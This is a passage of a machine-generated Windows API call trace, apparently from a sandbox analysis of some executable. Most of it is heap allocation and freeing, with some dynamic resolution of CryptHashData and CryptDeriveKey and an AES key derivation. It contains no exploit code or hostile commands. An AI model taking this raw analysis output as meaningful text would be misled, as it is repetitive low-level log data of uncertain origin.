dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0165.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9b9fd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.482] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0165.482] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0165.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0165.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0165.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0165.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x9bd918, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.487] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDeriveKey") returned 0x74f63188 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0165.487] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0165.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0165.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0165.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0165.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.490] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0165.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.495] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 